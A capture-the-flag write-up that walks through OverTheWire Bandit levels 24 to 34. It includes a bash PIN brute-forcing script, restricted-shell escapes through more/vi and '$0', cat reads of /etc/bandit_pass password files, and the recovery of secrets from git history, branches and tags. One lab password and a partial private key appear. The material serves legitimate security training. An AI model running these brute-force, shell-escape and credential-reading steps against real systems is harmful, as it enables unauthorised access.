After some time, this post is the third (and last for now) part of the writeup with the solutions for Bandit from OverTheWire. This third entry will have solutions from level 24 to level 34. For this section to complete it’s required a knowledge in specific Linux tools, like git.
You can go and check out previous entries for this same OverTheWire challenge:
For you to continue with this last part, you need the last key (level 24), so you can log it into the last machine.
Table of Contents
Level 24 -> 25
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time.
On this level we aimed to bruteforce a binary and get the following key.
For us to interact with the app we can use netcat, providing host and port to connect to. This will prompt us with an input to provide current password and a four digits pin.
To solve this challenge I created an script, the only thing we have to provide is the current key, which is required as per the instructions.
$ ssh bandit24@bandit.labs.overthewire.org -p 2220
bandit24@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 1234
Wrong! Please enter the correct current password and pincode. Try again.
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 1235
Wrong! Please enter the correct current password and pincode. Try again.
^C
I based on this StackExchange entry to create the script, it uses coproc to be able to interact (input and output) with the remote app acting as a client on a TCP socket. I only need to iterate over all 4-digits combinations and exit when key is found:
#!/bin/bash
key="*** EDITED ***"
coproc nc localhost 30002
read -r cmd <&"${COPROC[0]}"
echo $cmd
for i in {0000..9999}; do
echo $key $i >&"${COPROC[1]}"
read -r cmd <&"${COPROC[0]}"
case $cmd in
Wrong*) ;;
*)
echo "$i - $cmd"
read -r cmd <&"${COPROC[0]}"
echo $cmd
break
;;
esac
done
You can see how easy it’s get fetch the next key:
bandit24@bandit:~$ cd /tmp/natryvat24
bandit24@bandit:/tmp/natryvat24$ ./script.sh
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
2219 - Correct!
The password of user bandit25 is *** EDITED ***
Level 25 -> 26
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
NOTE: if you’re a Windows user and typically use Powershell to ssh into bandit: Powershell is known to cause issues with the intended solution to this level. You should use command prompt instead.
This is a very tricky level, I even had to cheat a little bit and google how to solve this one.
Once we log in as bandit25 user, we get a ssh key we can use to log in. We just have to copy it in local (it¡s not permitted to use it from localhost), change to restrictive permissoins (400 would work) and use it as a key (-i flag) on ssh command.
$ bandit25@bandit.labs.overthewire.org -p 2220
bandit25@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ cat bandit26.sshkey
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW
*** EDITED ***
IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY=
-----END RSA PRIVATE KEY-----
When we try to log in, we are allowed, but immediatelly we’re logged out and connection gets closed.
Getting closed connection.
Getting back with user bandit25, we can check which shell user has configured, we can see it has a weird /usr/bin/showtext “shell” and it’s content is a text file dispalyed using more command.
Checking user shell.
I got into a rabbit hole at this point, and after googling this I got to this interesting trick, which consist on making terminal size as smaller as possible, which would make more command to show progress into the console. Before getting to the end we only have to press V and we would get into a vi-kind terminal. From there we can just open the desired file, on this case /etc/bandit_pass/bandit26.
Follow this steps:
Press V, Press ESC, type :e /<filepath>
Performing trick.
Finally, we only need to get a shell as bandit26 user. To do so, we can use this technique described on this StackExchange entry.
We set our desired shell value:
:set shell=/bin/bash
And get interactive shell using:
:shell
Level 26 -> 27
Good job getting a shell! Now hurry and grab the password for bandit27!
We already get password from level 26, and we can use it, but still need to do trick on last level, minimize window and get shell using vim-like console.
This is a low-hanging fruit. We have an app which can run commands as bandit27 user. So we can just cat bandit27 password, we know common place to look for it.
:shell
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id
bandit26@bandit:~$ ./bandit27-do ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
*** EDITED ***
Level 27 -> 28
There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo via the port 2220. The password for the user bandit27-git is the same as for the user bandit27.
Clone the repository and find the password for the next level.
Most of the level on this entry are related to git, and this is the first one.
We have to clone a git repo and we got the ssh location. To download repo we only have to use git clone <repo> command.
$ ssh bandit27@bandit.labs.overthewire.org -p 2220
bandit27@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
bandit27@bandit:~$ mkdir /tmp/natryvat27 && cd /tmp/natryvat27
bandit27@bandit:/tmp/natryvat27$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host 'localhost (127.0.0.1)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit27/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
!!! You are trying to log into this SSH server on port 22, which is not intended.
bandit27-git@localhost: Permission denied (publickey).
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
On this first attempt we got and error, and that’s because git tries to connecto to port 22, but as per instrucctions server is on port 2220. Portis provided after “localhost”:
bandit27@bandit:/tmp/natryvat27$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit27/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| ´_ \ / _` | ´_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit27-git@localhost´s password:
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
Having our repo downloaded, we see it has a file called README inside, and password for the next level is there.
bandit27@bandit:/tmp/natryvat27$ ls
repo
bandit27@bandit:/tmp/natryvat27$ cd repo/
bandit27@bandit:/tmp/natryvat27/repo$ ls
README
bandit27@bandit:/tmp/natryvat27/repo$ cat README
The password to the next level is: *** EDITED ***
Level 28 -> 29
There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo via the port 2220. The password for the user bandit28-git is the same as for the user bandit28.
Clone the repository and find the password for the next level.
This is similar to last level, we have to download the repo (don’t forget to add port to URL) and its contents:
$ ssh bandit28@bandit.labs.overthewire.org -p 2220
bandit28@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
bandit28@bandit:~$ mkdir /tmp/natryvat28 && cd /tmp/natryvat28
bandit28@bandit:/tmp/natryvat28$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit28-git@localhost´s password:
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/natryvat28$ cd repo/
bandit28@bandit:/tmp/natryvat28/repo$ ls
README.md
bandit28@bandit:/tmp/natryvat28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
Password was also there but it was removed.
We can see if change it’s on a previous version of the repo. Using git log we can see last commit message is “fix info leak“, which could mean password was covered there.
bandit28@bandit:/tmp/natryvat28/repo$ git log
commit 674690a00a0056ab96048f7317b9ec20c057c06b (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date: Thu Apr 10 14:23:19 2025 +0000
fix info leak
commit fb0df1358b1ff146f581651a84bae622353a71c0
Author: Morla Porla <morla@overthewire.org>
Date: Thu Apr 10 14:23:19 2025 +0000
add missing data
commit a5fdc97aae2c6f0e6c1e722877a100f24bcaaa46
Author: Ben Dover <noone@overthewire.org>
Date: Thu Apr 10 14:23:19 2025 +0000
initial commit of README.md
We can move to that change using git checkout or git switch followed by the commit hash. Checking README file once again, we can see the password now:
bandit28@bandit:/tmp/natryvat28/repo$ git checkout fb0df1358b1ff146f581651a84bae622353a71c0
Note: switching to 'fb0df1358b1ff146f581651a84bae622353a71c0'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at fb0df13 add missing data
bandit28@bandit:/tmp/natryvat28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: *** EDITED ***
Level 29 -> 30
There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo via the port 2220. The password for the user bandit29-git is the same as for the user bandit29.
Clone the repository and find the password for the next level.
On this level we have another repo. If we follow same steps as in previous level we won’t find anything interesting, only commit done was to fix username but password is still not shown.
$ ssh bandit29@bandit.labs.overthewire.org -p 2220
bandit29@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
bandit29@bandit:~$ mkdir /tmp/natryvat29 && cd /tmp/natryvat29
bandit29@bandit:/tmp/natryvat29$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit29-git@localhost´s password:
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.
bandit29@bandit:/tmp/natryvat29$ ls
repo
bandit29@bandit:/tmp/natryvat29$ cd repo/
bandit29@bandit:/tmp/natryvat29/repo$ ls
README.md
bandit29@bandit:/tmp/natryvat29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: <no passwords in production!>
bandit29@bandit:/tmp/natryvat29/repo$ git log
commit 3b8b91fc3c48f1a19d05670fd45d3e3f2621fcfa (HEAD -> master, origin/master, origin/HEAD)
Author: Ben Dover <noone@overthewire.org>
Date: Thu Apr 10 14:23:21 2025 +0000
fix username
commit 8d2ffeb5e45f87d0abb028aa796e3ebb63c5579c
Author: Ben Dover <noone@overthewire.org>
Date: Thu Apr 10 14:23:21 2025 +0000
initial commit of README.md
bandit29@bandit:/tmp/natryvat29/repo$ git checkout 8d2ffeb5e45f87d0abb028aa796e3ebb63c5579c
Note: switching to '8d2ffeb5e45f87d0abb028aa796e3ebb63c5579c'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 8d2ffeb initial commit of README.md
bandit29@bandit:/tmp/natryvat29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit29
- password: <no passwords in production!>
bandit29@bandit:/tmp/natryvat29/repo$ git checkout master
Previous HEAD position was 8d2ffeb initial commit of README.md
Switched to branch 'master'
Your branch is up to date with 'origin/master'.
Only option is to check for another branch which could have different contents.
bandit29@bandit:/tmp/natryvat29/repo$ git branch
* master
In local, we only have one branch (master). We can still check for remote branches using git ls-remote command. It would prompt you for password once again.
bandit29@bandit:/tmp/natryvat29/repo$ git ls-remote
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit29-git@localhost´s password:
From ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
3b8b91fc3c48f1a19d05670fd45d3e3f2621fcfa HEAD
a97d0dbf8fd910ead6fcf648829ff55c1a629c8e refs/heads/dev
3b8b91fc3c48f1a19d05670fd45d3e3f2621fcfa refs/heads/master
c2e20a2bcc4815a984fbef4c7a96ca6e4de35c48 refs/heads/sploits-dev
From the output we can see some more branches besides master.
To see their contents, we have to download them (git fetch <remote name> <branch name>) and switching into it (git switch <branch name>). Checking into dev branch would give us next password.
bandit29@bandit:/tmp/natryvat29/repo$ git fetch origin refs/heads/dev
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit29-git@localhost´s password:
From ssh://localhost:2220/home/bandit29-git/repo
* branch dev -> FETCH_HEAD
bandit29@bandit:/tmp/natryvat29/repo$ git switch dev
branch 'dev' set up to track 'origin/dev'.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/natryvat29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: *** EDITED ***
Level 30 -> 31
There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo via the port 2220. The password for the user bandit30-git is the same as for the user bandit30.
Clone the repository and find the password for the next level.
We have another git repo on this level. If we read README file, which is the only file present in the repo, we won’t see anothing interesting, there are also no more commit we can swtich to. We can still check for remot branches.
$ ssh bandit30@bandit.labs.overthewire.org -p 2220
bandit30@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
bandit30@bandit:~$ mkdir /tmp/natryvat30 && cd /tmp/natryvat30
bandit30@bandit:/tmp/natryvat30$ git clone ssh://bandit30-git@localhost:2220/home/bandit30-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit30-git@localhost´s password:
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (4/4), done.
bandit30@bandit:/tmp/natryvat30$ cd repo/
bandit30@bandit:/tmp/natryvat30/repo$ ls
README.md
bandit30@bandit:/tmp/natryvat30/repo$ cat README.md
just an epmty file... muahaha
bandit30@bandit:/tmp/natryvat30/repo$ git log
commit fb05775f973256dc6d8d5bb6a8e6b96b0d8795c8 (HEAD -> master, origin/master, origin/HEAD)
Author: Ben Dover <noone@overthewire.org>
Date: Thu Apr 10 14:23:24 2025 +0000
initial commit of README.md
bandit30@bandit:/tmp/natryvat30/repo$ git ls-remote
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit30-git@localhost´s password:
From ssh://bandit30-git@localhost:2220/home/bandit30-git/repo
fb05775f973256dc6d8d5bb6a8e6b96b0d8795c8 HEAD
fb05775f973256dc6d8d5bb6a8e6b96b0d8795c8 refs/heads/master
84368f3a7ee06ac993ed579e34b8bd144afad351 refs/tags/secret
Surprisingly, there is only one branch, but we see there is another object, a tag.
We can still download it and check it out. As this is a tag and now a commit itself, we can use git show <tag name> and Voilà!
bandit30@bandit:/tmp/natryvat30/repo$ git fetch origin refs/tags/secret
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit30-git@localhost´s password:
From ssh://localhost:2220/home/bandit30-git/repo
* tag secret -> FETCH_HEAD
bandit30@bandit:/tmp/natryvat30/repo$ git show secret
*** EDITED ***
Level 31 -> 32
There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo via the port 2220. The password for the user bandit31-git is the same as for the user bandit31.
Clone the repository and find the password for the next level.
One last git challenge. On this one we got an interesting message, or would I say request?
$ ssh bandit31@bandit.labs.overthewire.org -p 2220
bandit31@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
bandit31@bandit:~$ mkdir /tmp/natryvat31 && cd /tmp/natryvat31
bandit31@bandit:/tmp/natryvat31$ git clone ssh://bandit31-git@localhost:2220/home/bandit31-git/repoCloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit31-git@localhost´s password:
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (4/4), done.
bandit31@bandit:/tmp/natryvat31$ cd repo/
bandit31@bandit:/tmp/natryvat31/repo$ ls
README.md
bandit31@bandit:/tmp/natryvat31/repo$ cat README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
We are aimed to create a file with specific content and push it into master branch.
After creating the file and checking repo status for changes to commit, we see nothing.
bandit31@bandit:/tmp/natryvat31/repo$ echo May I come in? > key.txt
bandit31@bandit:/tmp/natryvat31/repo$ git status
On branch master
Your branch is up to date with 'origin/master'.
nothing to commit, working tree clean
This might be because we are not in a git repo (which we are), or created file it’s excluded from changes, this is defined on .gitignore file.
As repo is ignoring all TXT files, we can just remove that restriction (clearing .gitignore file) and that should be enough.
bandit31@bandit:/tmp/natryvat31/repo$ ls -la
total 24
drwxrwxr-x 3 bandit31 bandit31 4096 May 9 01:27 .
drwxrwxr-x 3 bandit31 bandit31 4096 May 9 01:25 ..
drwxrwxr-x 8 bandit31 bandit31 4096 May 9 01:28 .git
-rw-rw-r-- 1 bandit31 bandit31 6 May 9 01:25 .gitignore
-rw-rw-r-- 1 bandit31 bandit31 15 May 9 01:27 key.txt
-rw-rw-r-- 1 bandit31 bandit31 147 May 9 01:25 README.md
bandit31@bandit:/tmp/natryvat31/repo$ cat .gitignore
*.txt
bandit31@bandit:/tmp/natryvat31/repo$ echo "" > .gitignore
bandit31@bandit:/tmp/natryvat31/repo$
Now we can see file was created. Only missing action is to add change into stage (git add <files ...>), commit the changes (git commit -m <message>) and push them (git push <remote name> <branch name>).
In the output we can see out next password:
bandit31@bandit:/tmp/natryvat31/repo$ git status
On branch master
Your branch is up to date with 'origin/master'.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: .gitignore
Untracked files:
(use "git add <file>..." to include in what will be committed)
key.txt
no changes added to commit (use "git add" and/or "git commit -a")
bandit31@bandit:/tmp/natryvat31/repo$ git add key.txt .gitignore
bandit31@bandit:/tmp/natryvat31/repo$ git commit -m "add key.txt file"
[master be18dfe] add key.txt file
2 files changed, 2 insertions(+), 1 deletion(-)
create mode 100644 key.txt
bandit31@bandit:/tmp/natryvat31/repo$ git push origin master
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can´t be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
bandit31-git@localhost´s password:
Enumerating objects: 6, done.
Counting objects: 100% (6/6), done.
Delta compression using up to 2 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (4/4), 335 bytes | 335.00 KiB/s, done.
Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: *** EDITED ***
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost:2220/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://localhost:2220/home/bandit31-git/repo'
Level 32 -> 33
After all this git stuff, it’s time for another escape. Good luck!
This is a funny one. Since we log in all commands we write are Uppercase. This makes all commands to be unknown.
An important var in Linux is $0, which refers to current script name or shell name. Which means that executing $0 will result on getting current shell prompt. So, once gaining shell we can query current user password on kwnon bandit location.
$ ssh bandit32@bandit.labs.overthewire.org -p 2220
bandit32@bandit.labs.overthewire.org´s password:
Welcome to OverTheWire!
WELCOME TO THE UPPERCASE SHELL
>> ls
sh: 1: LS: Permission denied
>> whoami
sh: 1: WHOAMI: Permission denied
>> $0
$ whoami
bandit33
$ cat /etc/bandit_pass/bandit33
*** EDITED ***
$ exit
>> ^CConnection to bandit.labs.overthewire.org closed.
Level 33 -> 34
At this moment, level 34 does not exist yet.
At this moment, level 34 does not exist yet.
This is the last level. As of now, no more levels are developed. We will wait for more content like this to come. And hopefully OverTheWire creator add more levels to this bandit serie.